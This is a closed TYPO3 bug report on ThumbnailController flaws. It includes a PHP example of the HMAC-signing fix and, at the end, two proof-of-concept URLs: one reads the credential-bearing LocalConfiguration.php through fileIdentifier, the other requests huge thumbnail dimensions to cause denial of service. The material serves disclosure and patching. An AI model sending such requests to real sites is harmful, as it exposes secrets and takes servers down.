Bug #85875 (closed)

Issues in ThumbnailController

Added by Oliver Hader over 5 years ago. Updated over 5 years ago.

Status: Closed
Priority: Must have
Assignee: -
Category: Backend API
Start date: 2018-08-16
% Done: 100%
TYPO3 Version: 8
PHP Version: 7.2

Description

  • information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage)
  • denial of service (dimensions, basically whole configuration can be arbitrary)

Introduced in https://review.typo3.org/#/c/56765/ - not yet released in 9.4.0 or 8.7.19

Solution: Add HMAC to all HTTP request parameters.
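The fix named above, as an added stand-alone illustration (not TYPO3's own ThumbnailController code): the side that builds the thumbnail link computes an HMAC over the canonical form of every request parameter, and the controller recomputes and compares that HMAC before it resolves any file or calls the image processor. The function names, the `hmac` parameter name and the secret constant are assumptions for the demonstration; the sample values are constructed from the parameters used in this report.

```php
<?php
declare(strict_types=1);

// Added example, not the TYPO3 patch. Demonstrates signing all thumbnail
// request parameters with an HMAC so that neither fileIdentifier nor the
// processingInstructions can be changed by the client.

// Placeholder: in a real installation this must be a per-installation secret.
const THUMBNAIL_HMAC_SECRET = 'REPLACE-WITH-INSTALLATION-SECRET';

/**
 * Recursively sort keys and cast scalars to strings so that the canonical
 * form does not depend on parameter order or on int-vs-string typing
 * (a query string parses back as strings, so the generator side must
 * hash the same representation).
 */
function canonicalizeParameters(array $data): array
{
    ksort($data);
    foreach ($data as $key => $value) {
        $data[$key] = is_array($value) ? canonicalizeParameters($value) : (string)$value;
    }
    return $data;
}

/** HMAC-SHA256 over the canonical query-string encoding of the parameters. */
function computeThumbnailHmac(array $parameters): string
{
    $canonical = http_build_query(canonicalizeParameters($parameters));
    return hash_hmac('sha256', $canonical, THUMBNAIL_HMAC_SECRET);
}

/** Link-generator side: emits the parameters together with their HMAC. */
function buildThumbnailQuery(string $fileIdentifier, array $processingInstructions): string
{
    $parameters = [
        'fileIdentifier' => $fileIdentifier,
        'processingInstructions' => $processingInstructions,
    ];
    $parameters['hmac'] = computeThumbnailHmac($parameters);
    return http_build_query($parameters);
}

/**
 * Controller side: returns true only if the HMAC covers exactly the
 * parameters that were received. Must run before any file access or
 * image processing so that tampered requests cost nothing.
 */
function verifyThumbnailRequest(array $query): bool
{
    if (!isset($query['hmac']) || !is_string($query['hmac'])) {
        return false;
    }
    $receivedHmac = $query['hmac'];
    unset($query['hmac']);
    if (!isset($query['fileIdentifier']) || !isset($query['processingInstructions'])) {
        return false;
    }
    // hash_equals compares in constant time, so the check itself does not
    // leak how many leading characters of the HMAC were correct.
    return hash_equals(computeThumbnailHmac($query), $receivedHmac);
}

// Constructed sample: a link as the backend would generate it.
$queryString = buildThumbnailQuery(
    '1:/user_upload/after_01.png',
    ['width' => '64', 'height' => '64c', 'crop' => '']
);
parse_str($queryString, $parsed);
echo 'untouched link: ', verifyThumbnailRequest($parsed) ? 'accepted' : 'rejected', PHP_EOL;

// The same link with fileIdentifier rewritten to a configuration file.
$tampered = $parsed;
$tampered['fileIdentifier'] = 'typo3conf/LocalConfiguration.php';
echo 'changed fileIdentifier: ', verifyThumbnailRequest($tampered) ? 'accepted' : 'rejected', PHP_EOL;

// The same link with oversized dimensions.
$tampered = $parsed;
$tampered['processingInstructions']['width'] = '1000000';
$tampered['processingInstructions']['height'] = '1000000c';
echo 'changed dimensions: ', verifyThumbnailRequest($tampered) ? 'accepted' : 'rejected', PHP_EOL;

// A request without any HMAC at all.
$missing = $parsed;
unset($missing['hmac']);
echo 'missing hmac: ', verifyThumbnailRequest($missing) ? 'accepted' : 'rejected', PHP_EOL;
```

The HMAC is computed over every parameter the controller acts on, not just `fileIdentifier`; signing only the file would still leave the dimensions open to the denial-of-service variant. The existing XSRF token is not a substitute, because it only proves the request came from a logged-in backend session, not that the parameters are the ones the backend generated.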

PoC

The XSRF token has to be adjusted in the links below.

Information Disclosure

http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64
&processingInstructions%5Bheight%5D=64c
&processingInstructions%5Bcrop%5D=

Denial of Service

http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png
&processingInstructions%5Bwidth%5D=1000000
&processingInstructions%5Bheight%5D=1000000c
&processingInstructions%5Bcrop%5D=